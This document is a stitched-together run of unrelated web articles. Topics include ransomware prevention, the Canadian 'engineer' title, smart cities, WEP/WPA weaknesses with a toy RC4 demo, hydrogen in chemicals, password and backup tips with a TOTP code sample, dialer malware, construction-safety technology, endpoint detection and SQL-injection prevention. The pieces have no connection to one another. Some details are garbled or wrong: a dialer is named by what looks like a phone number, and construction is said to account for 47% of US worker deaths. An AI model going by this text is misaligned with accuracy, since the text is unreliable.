To prevent ransomware attacks, it is essential to have a multi-layered approach that includes both technical and non-technical measures. Technical measures include installing and regularly updating anti-virus and anti-malware software, using firewalls, and implementing intrusion detection and prevention systems. It is also crucial to keep all software and operating systems up to date with the latest security patches.
Non-technical measures include educating employees on how to recognize and avoid phishing emails and suspicious links, limiting access to sensitive data, and regularly backing up important files. Backing up data is particularly important as it allows organizations to restore their systems to a previous state in case of a ransomware attack.
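As a concrete illustration of the backup advice above, the following Python sketch copies a folder into a new timestamped destination, so each run leaves earlier versions untouched even if the live copy is later encrypted by ransomware. The paths are hypothetical, and in practice the destination should live on detached or offline storage.

```python
import shutil
import time
from pathlib import Path

def back_up(source: Path, backup_root: Path) -> Path:
    """Copy `source` into a new timestamped folder so older
    versions survive if the live copy is encrypted or corrupted."""
    stamp = time.strftime("%Y%m%d-%H%M%S")
    destination = backup_root / f"{source.name}-{stamp}"
    shutil.copytree(source, destination)  # full copy, never overwrites old runs
    return destination
```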
In addition to these measures, it is also recommended to have a ransomware response plan in place. This plan should include steps to isolate infected systems, notify law enforcement, and communicate with stakeholders.
Overall, ransomware prevention requires a proactive and comprehensive approach that involves both technical and non-technical measures. By implementing these measures and staying vigilant, organizations can reduce the risk of falling victim to a ransomware attack.
I enjoyed your article on the use of the term engineer in Canada (“Who are you calling an engineer?”, Feb. 22). Having worked in the IT industry years before becoming an engineer I can understand the confusion about the title of engineer. There are a lot of people in the IT industry who do not realize that they are not entitled to use that term. Many of these certification programs perpetuated this problem, as you have indicated, by referring to their graduates as ‘engineers’. As a result I was unaware of the legal restrictions on the use of the term ‘engineer’ when I set myself on the path to become an engineer. I was also not aware that the four years it takes to obtain an engineering degree are not enough to call yourself an engineer. Currently each university graduate requires four years of work experience with clear application of theory under the guidance of professional engineers before they are eligible to be licensed. That makes a total of eight years of training before one can obtain a license and use the term engineer.
It should be noted that (in Ontario) the provincial government is the creator of these laws and the function of these laws is to protect the public. The associations are only tasked with enforcing these laws and regulating the activities of the members of the association. If an engineer does not take proper care when performing his or her duties, their license can be suspended or revoked. The engineer is directly answerable for the results of his or her work. Therefore, when someone deals with an engineer they have peace of mind knowing that the engineer is putting his or her livelihood on the line each time they seal a design.
In the U.S., this kind of restriction does not exist. The general attitude of the government there is buyer beware. Consequently, anyone who is drawing breath can call themselves an engineer, and as such the term ‘engineer’ just does not have the same meaning that it does in Canada. I personally have done a great deal of work in the U.S. since my graduation from university. The difference between a licensed engineer and everyone else calling themselves engineers is very obvious. It can be very frustrating dealing with someone who does not understand, and does not have, the accountability that a licensed engineer has.
This is not, by any means, directed at the IT community. These laws have been in place for quite some time now and have established strong case precedence. This is merely part of the association’s job in protecting the public as spelled out in the laws for each of the provinces and territories in Canada.
Joseph J. Place, P.Eng.
Project Manager, Systems Engineering
APEGGA letter beyond belief
You really should try the dictionary before you go asking people with vested and not always entirely declared interests for definitions of common English words. Although your most recent article isn’t entirely leaning in the sole direction of supporting the APEGGA et al, it’s very much slanted in that direction and not a very good piece of balanced journalism.
“Engineer” is not a protected proper name, even when used in a job description, just because some association says so. A simple search on www.google.ca would have shown you over 190,000 results for the phrase “systems engineer”, and nearly double that for “software engineer”. Even the freely available dictionaries on the Internet should make this abundantly clear.
If APEGGA would like to protect a particular title as an official professional designation, such as “Professional Engineer(TM)”, then they may do so under the various acts and laws of the jurisdictions where they operate, but they do not have, and never will have, a monopoly on the common noun “engineer”. Our language evolves continually and we will continue to find new ways to use the word “engineer” – its application in the computing discipline is only one such way. Sending a stupid cease and desist letter to some innocent company attempting to hire someone to do some form of engineering is nearly beyond belief!
What target is next in APEGGA’s sights? Will they take on one of their more famous and widely published colleagues? Henry Petroski says that we are all engineers of one kind or another and that engineering is a fundamental endeavour of all humans.
Greg A. Woods
Senior Partner, Planix, Inc.
Rampant urbanization is a serious threat as the number of people living in cities is likely to double by 2050. Many experts believe six billion people will live in cities by 2050, as compared to the 3.6 billion now and this increase is likely to put enormous pressure on the available resources. Clean water, power, waste management, living space and clean air will be some of the issues facing these future urbanites.
The problems that come with rampant urbanization are also unique opportunities to build cities that are smart and sustainable. Many countries have already embarked on this idea of building such smart cities and it is estimated that we will be spending a whopping $400 billion a year by 2020 to build them.
One of the driving forces behind these smart cities will be technologies such as Big Data and Internet of Things (IoT). In fact, Big Data opens up a world of opportunities for urban planners, government entities and private players to develop a range of applications that will make these future cities more livable.
Many applications are already being developed for smart cities such as smart street lights in Birmingham. This application will turn off street lights when there is no one around to conserve energy. Sensors attached to street lights will monitor footfall and noise levels and based on this data, the lights will turn themselves on or off.
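At its core, the street-light behaviour described above is a threshold rule over sensor readings. A minimal sketch, with invented thresholds purely for illustration:

```python
def light_should_be_on(footfall: int, noise_db: float,
                       footfall_min: int = 1, noise_min_db: float = 40.0) -> bool:
    """Turn the lamp on only if the sensors suggest someone is nearby."""
    return footfall >= footfall_min or noise_db >= noise_min_db

# Pedestrians detected -> light on; empty, quiet street -> light off.
assert light_should_be_on(footfall=3, noise_db=20.0)
assert not light_should_be_on(footfall=0, noise_db=25.0)
```

A real deployment would add hysteresis and time-of-day rules so lamps do not flicker on every passing noise, but the energy saving comes from exactly this kind of data-driven decision.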
In another pilot project in Seattle, 5,000 pieces of garbage were geo-tagged to monitor their movement to ensure that recycling is efficient. San Francisco, Vancouver and Bamberg in southern Germany have joined hands with a company called Autodesk to build 3D visualizations to monitor the performance of a city at any time.
Other cities, such as Bristol, England, are preparing for the future by installing an infrastructure network that will support the data generated through IoT and Big Data. All these examples are small steps that will eventually lead to the creation of smart cities that can sustain growing populations without hampering quality of life.
Perhaps, the best example of a futuristic city is Songdo in South Korea. This smart city is likely to become operational later this year and is built at a cost of $35 billion. Every inch of this city is wired and even children have bracelets with sensors to track them when they get lost. Climate, energy consumption, traffic congestion and just about everything else will be monitored by sensors and driven by policies based on this data.
To make sense of such vast amounts of data, Big Data technologies are the key. This is why many companies such as IBM are creating Big Data projects aimed to drive these futuristic societies.
With these initiatives, the future is sure going to be interesting!
Read Part 2 of this article.
Since the turn of the century, wireless networking has grown from a very exclusive tech toy into a full-blown phenomenon. For less than $50, anyone who can plug in a toaster can essentially set up a wireless local area network (WLAN). The problem with this plug-and-play generation of users is that very few understand how their data is sent through the air, much less comprehend the associated risks. Even as I write this, an estimated 40–50% of all wireless users are not implementing any form of protection. On the bright side, this percentage is falling, albeit very slowly.
The security problem is exacerbated by the fact that early attempts at encryption were flawed. Wired Equivalent Privacy (WEP) was found to be vulnerable to various statistical weaknesses in the encryption algorithm it employed to scramble data passed over the WLAN. While attempts were made to correct the problem, it's still a relatively simple feat to crack WEP and essentially pull the password right out of the air. In addition, WEP suffers from other problems that make it unacceptable for use in any secure environment.
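WEP's specific statistical attacks are beyond a short example, but one consequence of its design, a small initialization-vector space that forces keystream reuse, is easy to demonstrate. In the toy Python sketch below (illustrative only, not an actual WEP cracker), two messages encrypted under the same RC4 keystream cancel the key when XOR-ed together, leaving only the XOR of the plaintexts for an eavesdropper to analyze.

```python
def rc4_keystream(key: bytes, length: int) -> bytes:
    # Key-scheduling algorithm (KSA)
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) % 256
        s[i], s[j] = s[j], s[i]
    # Pseudo-random generation algorithm (PRGA)
    out, i, j = [], 0, 0
    for _ in range(length):
        i = (i + 1) % 256
        j = (j + s[i]) % 256
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) % 256])
    return bytes(out)

def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

# Two packets encrypted under the SAME keystream (a reused WEP IV):
key = b"secret-key"
p1, p2 = b"ATTACK AT DAWN", b"RETREAT AT TEA"
ks = rc4_keystream(key, len(p1))
c1, c2 = xor(p1, ks), xor(p2, ks)

# The eavesdropper never learns the key, yet c1 XOR c2 == p1 XOR p2,
# which is exactly the kind of leak WEP's tiny IV space makes routine.
assert xor(c1, c2) == xor(p1, p2)
```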
The wireless community knew early on that these problems existed. However, they also realized that it would take years until the standardized correction was designed and implemented into new hardware. In the meantime, millions of users needed reliable protection. The Wi-Fi Alliance stepped up to the challenge and created an interim "standard" called Wi-Fi Protected Access (WPA).
WPA did an excellent job of patching the problems in WEP. With only a software upgrade, it corrected almost every security problem either created or ignored by WEP. However, WPA also created new problems:
- One flaw allowed an attacker to cause a denial-of-service attack, if the attacker could bypass several other layers of protection.
- A second flaw exists in the method with which WPA initializes its encryption scheme. Consequently, it's actually easier to crack WPA than it is to crack WEP. This flaw is the subject of this article.
Hydrogen Application in Chemicals Industry
The application of hydrogen in the chemicals industry is growing in popularity, with an emphasis on utilizing its adaptability as a feedstock for a range of chemical processes to support the sector's sustainability efforts.

Hydrogen serves as a clean and effective input in processes like hydrogenation, ammonia production, and methanol synthesis, making it essential for lowering the industry's carbon emissions.

Investigating hydrogen applications in the chemicals sector offers game-changing possibilities, from improving manufacturing efficiency to enabling the production of green chemicals, all in line with the larger objective of a low-carbon, environmentally conscious sector.
Hydrogen plays a key role in the chemical industry as a raw material and an important energy source in many chemical processes. The use of hydrogen in the chemical industry offers numerous benefits, including improved efficiency, increased productivity and reduced environmental impact.
"Green hydrogen," created by electrolysis using renewable energy sources, is gaining popularity as the industry focuses more on sustainability and cutting carbon emissions. As a cleaner substitute for hydrogen made from fossil fuels, green hydrogen has the potential to become even more important in the chemical industry.

Here are some key applications of hydrogen in the chemicals industry:
- Hydrogenation: One of the fundamental uses of hydrogen in the chemical industry is the hydrogenation process, in which hydrogen is added to unsaturated organic compounds. Hydrogenation produces a number of chemicals, including vegetable oils, margarine, and petroleum products. This process improves the quality of these products and reduces their environmental impact by reducing their carbon content.
- Ammonia Production: Ammonia is an important chemical raw material for the production of fertilizers, explosives and other chemicals. The Haber-Bosch process is the most common method of producing ammonia and requires large amounts of hydrogen. As demand for fertilizers and other ammonia-based products increases, demand for hydrogen in the chemical industry is also expected to increase.
- Methanol Production: Methanol is a multipurpose chemical that finds use in the manufacturing of plastics, solvents, and fuel. Although it can also be made using renewable energy sources from carbon dioxide and hydrogen, methanol is normally produced from coal or natural gas. The production of methanol from renewable hydrogen has a large positive impact on the environment and can lessen the chemicals industry's carbon footprint.
- Olefin Production: Olefins are a class of compounds that are used to make a variety of goods, such as fibers, rubber, and plastics. Large amounts of hydrogen are produced when hydrocarbons are cracked in order to produce olefins. Hydrogen provides substantial energy savings and environmental advantages in the olefins production process.
- Refining: Hydrogen is also used in the refining of petroleum products to remove impurities and improve the quality of the final products. The use of hydrogen in refining processes can also help reduce emissions and improve energy efficiency.
- Hydrogenation Reactions: In the synthesis of many different chemicals, hydrogenation reactions are frequent. Hydrogen gas can be used to hydrogenate unsaturated compounds when a catalyst is present. Edible oils and fats are produced using this process, for instance.
- Hydrogen Peroxide Production: Hydrogen peroxide is made with the use of hydrogen. An important chemical with a variety of uses, including as a bleaching agent, hydrogen peroxide is created when hydrogen reacts with anthraquinone in the anthraquinone process.
- Hydrogen in the Production of Synthetic Fuels: By converting hydrogen and carbon monoxide into hydrocarbons during procedures like Fischer-Tropsch synthesis, hydrogen can play a significant role in the creation of synthetic fuels.
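The hydrogen appetite of the Haber-Bosch route mentioned above follows directly from its overall reaction, N2 + 3H2 → 2NH3. The back-of-the-envelope Python sketch below uses rounded molar masses; the result is a stoichiometric minimum, not plant data.

```python
# Molar masses (g/mol), rounded
M_H2 = 2.016
M_NH3 = 17.031

def hydrogen_per_tonne_ammonia() -> float:
    """Tonnes of H2 consumed per tonne of NH3 via N2 + 3H2 -> 2NH3."""
    mol_nh3 = 1_000_000 / M_NH3        # moles of NH3 in one tonne
    mol_h2 = mol_nh3 * 3 / 2           # stoichiometry: 3 H2 per 2 NH3
    return mol_h2 * M_H2 / 1_000_000   # grams back to tonnes

print(round(hydrogen_per_tonne_ammonia(), 3))  # 0.178
```

By this ratio, a plant producing 1,000 tonnes of ammonia per day needs roughly 178 tonnes of hydrogen daily, which is why ammonia synthesis dominates industrial hydrogen demand.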
Frequently Asked Questions (FAQ):
How is hydrogen used in the chemical industry?
Hydrogen is extensively used in the chemical industry as a key ingredient for various processes, including hydrogenation reactions to produce saturated fats, ammonia synthesis for fertilizer production, methanol synthesis as a precursor for chemicals and fuels, and as a reducing agent in numerous chemical reactions for the production of various compounds.
How is hydrogen gas valuable for the chemical industry?
Hydrogen gas is valuable for the chemical industry due to its versatility as a feedstock, reducing agent, and energy carrier. It enables the production of a wide range of chemicals, facilitates efficient reactions and transformations, and serves as a clean and sustainable option when produced from renewable sources, contributing to the decarbonization of the industry.
What chemicals are required for hydrogen production?
The chemicals required for hydrogen production depend on the method used. Commonly used chemicals include natural gas (methane) for steam methane reforming, water for electrolysis, and hydrocarbon feedstocks for processes like partial oxidation or coal gasification. The specific chemicals used vary based on the chosen hydrogen production technology.
What are the barriers to the hydrogen industry?
Barriers to the hydrogen industry include high production costs, limited infrastructure for storage and distribution, technological challenges in efficient hydrogen production and utilization, and the need for supportive policies and regulations to promote widespread adoption and investment in hydrogen technologies. Additionally, public acceptance and safety concerns are also important considerations for the industry's growth.
Cyber security should be an ever-present concern for businesses of any size. Large organisations can afford to dedicate considerable resources to protecting their enterprise but smaller businesses often have to take a more cost-effective approach. Fortunately, there are several ways to substantially improve your cyber security. These five tips will allow you to minimize your susceptibility to digital threats through the application of simple and easy techniques.
For the protection of your most valuable data, use two-factor authentication to add an additional layer of security. Two-factor authentication means that the user has to pass an extra security check before they can access the content. This reduces the possibility of nefarious entities gaining access to your data even if they enter the correct password.
Many companies require users to enter a personalized code to access private information. The code is often sent via text or email to a previously verified address. The user enters their normal login details and then the code to complete the two-factor authentication.
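The "personalized code" described above is often generated with the time-based one-time password (TOTP) algorithm of RFC 6238, which many authenticator apps implement. The sketch below uses only Python's standard library and is for illustration; production systems should rely on vetted libraries and securely provisioned secrets.

```python
import hashlib
import hmac
import struct
import time

def totp(secret: bytes, at_time=None, step: int = 30, digits: int = 6) -> str:
    """RFC 6238 time-based one-time password (HMAC-SHA1 variant)."""
    if at_time is None:
        at_time = int(time.time())
    counter = struct.pack(">Q", at_time // step)      # 64-bit time counter
    mac = hmac.new(secret, counter, hashlib.sha1).digest()
    offset = mac[-1] & 0x0F                           # dynamic truncation
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)

# RFC 6238 Appendix B test vector: 8-digit code at t=59s, reference secret
print(totp(b"12345678901234567890", at_time=59, digits=8))  # 94287082
```

Because the code depends on both a shared secret and the current time window, a stolen password alone is not enough to log in, which is exactly the extra layer the article recommends.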
Poor password practice is the number one cause of serious security breaches. Take your password management seriously. Inform every member of your staff to create a password that is unique to them by combining more than one word and intentionally misspelling it with numbers in place of some letters. Capitalize letters at random to further reduce the chance of the password being guessed.
Change your passwords at regular intervals. It is easy to become complacent and keep the same password for months at a time but doing so will leave you more vulnerable to cyber threats. If you’re concerned about not remembering your new passwords, there are several reputable password management applications available that will simplify the entire process.
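The recipe above (several words, deliberate misspellings with digits, random capitalization) can be automated. The Python sketch below uses the standard-library `secrets` module for its randomness; the six-word list is a placeholder assumption, and a real generator would draw from a far larger dictionary.

```python
import secrets

SUBS = {"a": "4", "e": "3", "i": "1", "o": "0", "s": "5"}
WORDS = ["correct", "horse", "battery", "staple", "orbit", "velvet"]  # placeholder list

def make_password(n_words: int = 3) -> str:
    chars = []
    for word in (secrets.choice(WORDS) for _ in range(n_words)):
        for ch in word:
            if ch in SUBS and secrets.randbelow(2):
                chars.append(SUBS[ch])          # misspell with a digit
            elif secrets.randbelow(4) == 0:
                chars.append(ch.upper())        # capitalize at random
            else:
                chars.append(ch)
    return "".join(chars)

print(make_password())  # e.g. 'v3lvetB4tteryOrb1t'
```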
Back up your data regularly. Cyber threats can manifest themselves via theft or corruption and you could lose valuable files if you don’t back up your data. All back ups should be made to a source that is completely detached, physically and digitally, from your primary data storage device. If you back up your files onto a device in the same system, it could be subject to the same damage or threats that you’re trying to protect it from.
Create a regular back up schedule and automate the process if necessary. Encrypt the information and ensure it is fully password protected at all times. Don’t back up your files to a third party you don’t trust implicitly.
The digital landscape is mercurial and unpredictable. The threats you face will change from one day to the next so it’s important to constantly update your protections. Check your anti-virus software regularly for updates and install any recommended changes as soon as possible. If there is an option to automatically update your anti-virus software, ensure it is turned on if you trust the developers.
Similarly, you should keep all of your other software updated. Most updates are instigated by the developers in response to newly discovered threats so it’s important to be aware of any update prompts or notices.
The best deterrent to cyber threats is to ensure everyone in your operation is aware of the recommended security practices. Take the time to educate anyone who has access to your data on the most effective techniques regarding cyber security. Stay up to date and aware of any possible threats and pass the information on to all relevant parties as soon as possible. Only through constant research and keeping your finger on the pulse will you be able to protect your business consistently.
Cyber security is a serious consideration that should be a priority for all businesses. Organisations of any size can become victims of digital crime so it’s important to be proactive in your defence. Take the time to develop a culture of tight security and positive practices and you’ll substantially improve your chances of successfully repelling an attack.
Now that we've all got our heads wrapped around the idea that Artificial Intelligence (AI) is now a reality and is helping us be more productive (rather than taking over the world), in comes quantum computing.
Quantum computing is based on the principles of quantum mechanics, which examines the properties and behaviors of the smallest particles that make up everything around us. When applied to computing, this means utilizing aspects of computer science, physics, and mathematics to solve complex problems faster than on classical computers. To date, no machine has achieved this feat, but experts agree that quantum computing will become a reality for the workforce within the next five years.
A dialer (in its fraudulent form) is a program that uses a computer's modem to establish a dialup connection over the Internet and make money from calls. A connection is made by dialing a predetermined phone number and connecting to international or premium-rate local phone numbers. Dialers are capable of making an unauthorized connection and bypassing the local Internet service provider. After these activities, victims lose money through inflated phone bills.
Most dialers are malicious programs that work in the same manner as regular computer viruses. They change the system's essential dialup and networking settings without the user's consent or approval. A typical dialer runs on every computer startup and attempts to hide its presence on the system. A parasite doesn't affect the computer's performance and doesn't leave clues like unexpected advertisements or third-party toolbars, so its activity can hardly be noticed. Users of broadband lines, such as DSL, LAN or similar, cannot be affected because their computers have no modems installed.
Some dialers are legitimate applications developed by Internet service providers and certain companies. Their task is to ease the process of setting up an Internet connection or to perform marketing campaigns for third parties. Such parties provide their users with a license agreement and inform them about the installation of a dialer. Nevertheless, such programs are quite rare.
Activities that characterize dialers
- Using a compromised computer to connect to the high-cost phone numbers.
- Promoting potentially unsafe web sites with pornographic, advertising or other similar content.
- Modifying the system and altering essential dial-up and networking settings. The dialer does this to register itself as the default Internet connection service and to route the compromised computer’s Internet connections through itself.
- Changing the web browser’s settings. You may notice changes to your home page and default search engine, and you may be prevented from restoring these settings.
- Creating numerous links that can lead people to potentially insecure websites. A victim may also notice unknown desktop shortcuts to suspicious sites, unknown bookmarks, and new entries in his or her Favorites list.
- Providing no removal feature.
Infiltration techniques used by dialers
Although most dialers are very similar to regular viruses, their distribution methods are quite different. They do not spread like other types of malware. In most cases, people have to install them on the system like any other software. This can be done either with or without the user’s consent. More information about the major distribution channels used for the unnoticed installation of dialer parasites is provided below.
- Pornographic and illegal websites. Sites filled with adult-oriented content, illegal music and video files, and similar offers should be avoided. Otherwise, they can trick the user into downloading and manually installing a particular dialer on the system. Even if the site claims the installation is required to access the desired content, you should not agree to it. Such dialers not only fail to provide an uninstaller, but can also cost you money by making Internet connections through high-cost phone numbers.
- System vulnerabilities. Most malicious dialers get into the system by exploiting certain vulnerabilities. Such security holes may appear when anti-virus/anti-spyware software or the web browser is not kept up to date. A malicious dialer may also appear on your computer after you visit an insecure website loaded with malicious code or click on an unsafe pop-up ad. The affected user cannot notice anything suspicious, as these parasites do not display any setup wizards, dialogs, or warnings.
- Spam and malicious email messages. Some dialers are secretly installed on the system when the user opens a spam or malicious e-mail message. Some of these parasites arrive on the target PC as seemingly legitimate e-mail attachments. Their installation happens without the user’s consent or approval.
The most popular examples of dialers
There are lots of different dialers that are considered malicious. The following examples illustrate their behavior on an affected PC system.
661-748-0240 offers access to the Internet via high-cost telephone numbers. It redirects the web browser to certain Internet resources and changes the default home page without asking for user permission. This dialer can be secretly installed while visiting some unsafe websites. The parasite alters the registry so that the threat runs on every Windows startup, and creates a desktop shortcut named Click Me!!!. Most dialers are quite similar to this example; while they may not damage the system itself, they severely violate the privacy of the user.
Trojan.Dialer.yz connects its victim’s computer to the Internet through an expensive phone number. It is capable of accessing a predefined Internet resource on a required domain without asking the user for permission. This threat silently erases the web browser’s cache and history. The parasite gets into the system from insecure websites. The dialer complicates its detection and removal and has no functional uninstaller.
Trafficadvance is a far more harmful dialer that not only connects a compromised computer to the Internet using a premium-rate phone number, but also terminates some running applications and steals system information. Once executed, it modifies the Windows registry to register itself as the primary Internet connection service. This means that all further Internet connections will be made through an expensive phone number instead of the local Internet service provider’s default one. Such activity results in enormous phone bills.
Removing a dialer from the PC system
As noted above, most dialers work in the same manner as computer viruses and, therefore, can be found and removed with the help of a reliable anti-spyware program. We can recommend FortectIntego or SpyHunter 5Combo Cleaner, which have shown great results when removing dialers from the system.
Beware that in some cases even the best antivirus or spyware remover can fail to get rid of a particular dialer. That is why there are Internet resources such as 2-Spyware.com, which provide manual malware removal instructions. These instructions allow the user to manually delete all the files, directories, registry entries, and other objects that belong to a parasite. However, manual removal requires fair system knowledge and can therefore be a quite difficult and tedious task for novices.
Information updated: 2017-05-11 | <urn:uuid:51f70e4e-1379-4a6d-8519-c047b82ad4ef> | CC-MAIN-2024-38 | https://www.2-spyware.com/dialers-removal | 2024-09-20T21:36:11Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725701423570.98/warc/CC-MAIN-20240920190822-20240920220822-00728.warc.gz | en | 0.921041 | 1,347 | 2.546875 | 3 |
Although traditionally viewed as one of the least-digitized industry sectors, construction has recently benefited from new technological innovations that have improved many aspects of the industry. These improvements range from enhancing the efficiency of project management to upgrading payroll, accounts receivable, and lien filing processes. Perhaps one of the biggest and most important uses of technology in construction is improving workplace safety.
As the United States construction industry becomes larger and more technologically advanced, many industry leaders have identified implementing improved safety protocols as their top concern. The construction sector is one of the most dangerous industries to work in, with the sector accounting for 47% of total worker deaths in the United States in 2017. The Occupational Safety and Health Administration reports that 5,147 United States construction workers died while working in 2017, averaging around 14 deaths per day.
The biggest risks that construction workers face on a construction site, collectively known as the “Fatal Four,” include falling, being struck by an object, being electrocuted, and getting caught in between hazards. Experts estimate that eliminating the Fatal Four would save 582 workers’ lives in the United States every year. New construction technology can make that possible.
Technological innovations in workplace safety have advanced far beyond simple hard hats and safety glasses. From drones used in site inspections to exoskeletons that reduce the risk of injury, construction technology is making construction work safer. Here are some of the ways technology helps with workplace safety in construction.
1. Using drones for site surveys
Modern construction sites are larger in scope and complexity than ever before (and continue to grow), which makes it difficult to manage an entire site effectively. Site inspection can take days to finish. In addition, every site contains safety hazards that can pose a danger to site inspectors.
What if we can eliminate the need for site inspectors to put themselves in danger? Thanks to unmanned aerial vehicles, popularly known as drones, this is now possible. Developed initially for military use, drones have evolved to the more consumer-friendly role of providing unique photographic and video perspectives. As a result of this evolution, drones are now critical to improving construction site safety.
When equipped with infrared cameras and laser-based range finders, drones can conduct site surveys, look for safety hazards, and monitor construction workers, all while their human operators observe remotely from a safe location.
2. Using exoskeletons to reduce the risk of injury
Due to the nature of the job, construction workers face a high risk of straining their bodies or acquiring musculoskeletal disorders. These injuries are caused by lifting heavy objects, using heavy work tools, and using the wrong tools for the job. Thanks to new technology, construction workers can now perform these tasks more safely.
To limit the strain on construction workers’ bodies, project managers can assign exoskeletons, also known as exosuits, to employees. The exoskeletons are another piece of technology developed by the military that is now seeing applications in the construction industry. These suits are metal frameworks that can be equipped with mechanical systems that can multiply the wearer’s strength and improve their posture.
Two types of exoskeletons are available—power-assisted and unpowered.
Unpowered exosuits do not use motors or actuators but rather use a mechanical harness wrapped around a wearer’s body. Depending on the design, unpowered exosuits may be wrapped around the arms, shoulders, chest, waist, and thighs. The most common mechanism uses a rigid frame, usually made from a strong material such as carbon fiber, that acts as a counterweight and redistributes the weight of an object carried by the wearer away from the lumbosacral region to the pelvis, or even to the floor, for stability.
On the other hand, power-assisted exosuits are equipped with a network of motors and sensors that multiply the wearer’s strength. These can be powered by electric motors, pneumatic air muscles, or hydraulics that are designed to sense the wearer’s movement and signal the motors to augment the motion.
3. Using virtual reality technology in realistic safety training
Nothing beats safety training in eliminating fatalities and injuries in the construction industry. Many of the common safety hazards found at a construction site can be avoided if employees know how to handle them. However, safety memos and seminars can only do so much. Traditional lectures or video presentations may not be engaging enough for employees (especially younger ones) to retain the information that needs to be kept in mind while doing work on-site.
Virtual reality (VR) technology removes the limitations of the traditional training process and provides an immersive way for employees to learn about the safety hazards present in construction work. VR technology can simulate a realistic sensation of height, stress, and other psychological hazards that cannot be replicated in traditional safety training.
For instance, VR can simulate a worker entering a lift and show that they are being transported up where they need to fulfill certain tasks. Monitoring the worker’s heart rate and stress levels gives trainers insight into the worker’s experience, which they can use to help workers manage stress. Trainers can even create VR scenarios that are tailored to a specific construction site.
VR technology may seem too futuristic or distracting for construction firms to handle, but with the help of a unified endpoint management solution (UEM) like 42Gears SureMDM, you can ensure that VR headsets run only pre-approved applications.
Project owners and managers share one goal: to eliminate workplace fatalities and injuries in the construction industry. With innovations like drones, exosuits, and virtual reality, the industry is getting closer to reaching this goal.
About the Author:
Patrick Hogan is the CEO of Handle.com. | <urn:uuid:37cf1c17-8656-49de-bac5-9b1e84367b58> | CC-MAIN-2024-38 | https://www.42gears.com/blog/3-technological-solutions-to-construction-safety-issues/ | 2024-09-20T21:40:22Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725701423570.98/warc/CC-MAIN-20240920190822-20240920220822-00728.warc.gz | en | 0.945361 | 1,241 | 2.90625 | 3 |
As technology grows, so do threats. Adversaries in the modern day are constantly finding new ways to damage businesses and steal information.
Gone are the days of antivirus; companies are now having to tailor their defence mechanisms in the same way adversaries are tailoring their attacks. One singular, fool-proof method is no longer effective because attacks are gradually becoming more specific to each organisation.
What's the solution?
Antiviruses are failing to meet the expectations of many companies, yet many companies still rely on this technology, which leaves us with a problem. Do we remove the technology we have depended on for so long? Do we restructure our security measures?
The answer to this is to reinforce our technology with extra security measures that adapt to the current landscape of cybersecurity. In this day and age, endpoint detection is essential.
What is endpoint detection?
Endpoint detection is a system that constantly monitors activity over one network and responds to advanced threats. In contrast to antivirus which just protects individual systems, endpoint detection serves to protect an entire network. This is more secure for many businesses.
We have recently seen some companies implement AI in their endpoint security. The advantage of using machine learning is that it allows software to automatically detect threats and adapt more quickly to potential adversaries.

By noticing patterns through machine learning, AI-backed endpoint security can deliver a level of security that was previously unheard of. In fact, companies such as CrowdStrike are now incorporating endpoint protection that works in real time.

Even the former leaders in antivirus software are recognising the importance of endpoint detection. Slowly, we are seeing companies such as McAfee and Symantec develop technology that provides a more in-depth level of security, adapting to the speed at which current adversaries operate.
SQL injections are arguably the most common type of web attack to steal sensitive data from organizations. Any time you hear about data breaches resulting in stolen passwords or credit card data, it’s often the result of an SQL injection.
This in-depth guide is designed to help web administrators and website owners prevent SQL injections before an attack. Follow the steps below to learn how to prevent SQL injections and keep your company’s data safe.
Step #1: Validate User Inputs
One of the first things you should do is validate all user inputs. The process is commonly referred to as a “query redesign” or “input validation.”
You’ll need to identify your most essential SQL statements and create a whitelist of valid statements, then leave all unvalidated statements out of your queries.
You can also set up user inputs according to their context. For example, let’s say you have a form field on your website for visitors to input their email addresses. This field could be set up to only allow submissions with an “@” symbol, which would prevent someone from injecting something malicious into this field.
For fields asking for a social security number or phone number, you can limit those to only accept submissions with nine digits and ten digits, respectively.
This step alone won’t stop an SQL attack, but it’s a basic website security step that you can take to prevent common SQL injections.
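The whitelist approach described above can be sketched in a few lines of Python. The field names and patterns here are hypothetical; adjust them to your own data requirements.

```python
import re

# Whitelist patterns per field type (hypothetical formats).
PATTERNS = {
    "email": re.compile(r"^[^@\s]+@[^@\s]+\.[^@\s]+$"),
    "ssn": re.compile(r"^\d{9}$"),     # nine digits, no dashes
    "phone": re.compile(r"^\d{10}$"),  # ten digits, no formatting
}

def validate(field_type: str, value: str) -> bool:
    """Return True only if the value matches the whitelist pattern."""
    pattern = PATTERNS.get(field_type)
    return bool(pattern and pattern.fullmatch(value))

print(validate("email", "user@example.com"))  # True
print(validate("ssn", "123-45-6789"))         # False: dashes rejected
print(validate("phone", "5551234567"))        # True
```

Anything that fails validation is rejected before it ever reaches a query, which shrinks the attack surface even though it is not a complete defense on its own.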
Step #2: Data Sanitization
Next, you should do a data audit and clean up your data that contains special characters.
It’s common for attackers using SQL injections to rely on sequences of special characters to exploit unsanitized inputs. But if you set up your database layer to deny unexpected string concatenations, you can prevent these attacks.
This takes your input validation one step further. If you limit special characters in your data, it ensures that dangerous special characters from an SQL injection won’t get passed into an SQL query with instructions.
Using prepared statements is an excellent way to prevent unauthenticated queries in your SQL databases. But it starts with data sanitization, specifically by limiting special characters.
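A minimal sanitization sketch in Python might look like the following. The whitelist of allowed characters is an assumption chosen for illustration; note that this is a defense-in-depth measure that complements, rather than replaces, parameterized queries.

```python
# Conservative character whitelist (illustrative; tune per field).
ALLOWED = set("abcdefghijklmnopqrstuvwxyz"
              "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 _-.@")

def sanitize(value: str) -> str:
    """Strip characters outside the whitelist.

    This removes the quotes and semicolons that SQL injection payloads
    rely on. It supplements, but does not replace, prepared statements.
    """
    return "".join(ch for ch in value if ch in ALLOWED)

print(sanitize("alice@example.com"))           # unchanged
print(sanitize("name'; DROP TABLE users;--"))  # name DROP TABLE users--
```

The injected quotes and semicolons are gone, so the remaining text can no longer terminate a string literal or chain a second statement.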
Step #3: Actively Track Updates and Patching
Attackers have a knack for finding vulnerabilities in different databases and web applications. This turns into a game of cat and mouse.
